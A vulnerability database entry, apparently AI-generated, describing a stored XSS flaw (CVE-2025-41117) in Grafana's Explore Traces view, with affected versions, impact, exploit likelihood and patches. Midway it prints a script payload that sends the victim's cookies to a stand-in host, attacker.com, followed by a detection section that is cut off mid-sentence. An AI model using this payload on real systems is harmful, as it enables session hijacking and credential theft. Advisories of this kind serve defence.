
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-41117 is a stored Cross-Site Scripting (XSS) vulnerability in Grafana's Explore Traces view, where stack traces can be rendered as raw HTML, enabling injection of malicious JavaScript in the browser. It affects Grafana versions 12.2.0 through 12.2.3 (fixed in 12.2.4) and 12.3.0 through 12.3.1 (fixed in 12.3.2), with security patch variants also released. Only datasources using the Jaeger HTTP API are affected; Jaeger gRPC and Tempo datasources are not impacted. The vulnerability was disclosed on February 12, 2026, and carries a CVSS v3.1 base score of 6.1 (Medium) (Red Hat Advisory, Grafana Advisory, Red Hat Bugzilla).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically in the Explore Traces view's stack trace rendering logic. When Grafana retrieves stack trace data from a Jaeger HTTP API datasource, the content is rendered as raw HTML rather than being properly sanitized or escaped, allowing any embedded JavaScript to execute in the victim's browser. Exploitation requires that malicious JavaScript be present in the stack trace field — meaning an attacker must first be able to influence the data returned by the Jaeger HTTP API (e.g., by injecting a crafted trace). User interaction is required, as a victim must navigate to and view the affected stack trace in the Explore Traces view (Red Hat Bugzilla, Grafana Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's authenticated Grafana session, potentially leading to session hijacking, credential theft, and unauthorized actions within Grafana on behalf of the victim. The scope is changed (S:C in CVSS terms), meaning the impact extends beyond the vulnerable component to the user's browser environment. The attack surface is limited to organizations using Jaeger HTTP API datasources with the Explore Traces feature enabled, reducing the overall exposure compared to a universal XSS (Red Hat Advisory, Grafana Advisory).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the disclosure date. The EPSS score is approximately 0.009% (0.000090), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Red Hat Advisory, Grafana Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>./explore) by multiple users in a short timeframe; Jaeger HTTP API responses containing HTML tags or JavaScript keywords (<script>, onerror=, javascript:) in stack trace fields.Grafana has released patched versions: 12.2.4 (and 12.2.4-security-01) for the 12.2.x branch, and 12.3.2 (and 12.3.2-security-01) for the 12.3.x branch. Organizations should upgrade to these versions immediately. As a temporary workaround, restrict access to the Explore Traces feature to trusted users only, or migrate affected datasources from Jaeger HTTP API to Jaeger gRPC or Tempo, which are not affected by this vulnerability. Validate and sanitize stack trace data ingested from Jaeger HTTP API sources as an additional defensive measure (Grafana Advisory, Red Hat Advisory).
The vulnerability was noted in community CVE tracking channels, including Reddit's r/CVEWatch, where it appeared in trending CVE lists for February 12–13, 2026. The Grafana team published an official security advisory promptly on the disclosure date. No significant independent researcher commentary or major media coverage has been identified beyond standard vulnerability database aggregation (Grafana Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."